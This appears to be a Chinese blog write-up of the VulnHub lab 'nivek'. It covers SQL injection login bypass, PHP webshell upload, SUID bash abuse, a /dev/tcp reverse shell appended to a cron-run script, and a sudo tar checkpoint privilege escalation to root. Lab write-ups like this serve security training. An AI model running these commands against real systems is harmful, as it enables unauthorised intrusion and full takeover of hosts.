vulnhub-nivek

工具

 nmap

burpsuite

学习知识

计划任务文件

/etc/crontab

tar提权漏洞

sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

sudo使用

sudo -l                显示出自己(执行 sudo 的使用者)的权限

步骤

扫IP

扫端口

查看ftp服务

发现可以匿名登陆,但不能操作文件。

ftp 192.168.47.145
Name:anonymous
无密码

 

查看7080服务

是个登陆界面,尝试登录抓包,在email处发现sql

成功登录

源代码中找php文件

访问setting.php

发现文件上传点

上传php webshell

发现可以直接上传

寻找文件上传位置

访问此文件

并用kali连接

 

成功获得web shell

使用python提升为命令行

python -c "import pty;pty.spawn('/bin/bash')"

查找suid文件

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

说明执行/usr/bin/bash就会临时有eren的权限

/usr/bin/bash -p

使用eren用户,查看文件,含有文件backup.sh,查看

查看靶机计划任务文件

cat /etc/crontab

发现/home/eren/backup.sh文件每五分钟会自动运行一次

尝试将反向shell写入/home/eren/backup.sh,等待连接

echo "bash -i >& /dev/tcp/192.168.47.141/6666 0>&1" >> /home/eren/backup.sh

kali监听6666端口,等待一会,会自动连接

连接成功

查看此时权限

sudo -l

发现可以使用root的/bin/tar

尝试tar提权漏洞

sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

在root目录下找到root.txt

成功

posted @ 2023-04-24 20:44  LoYoHo00  阅读(101)  评论(0编辑  收藏  举报
levels of contents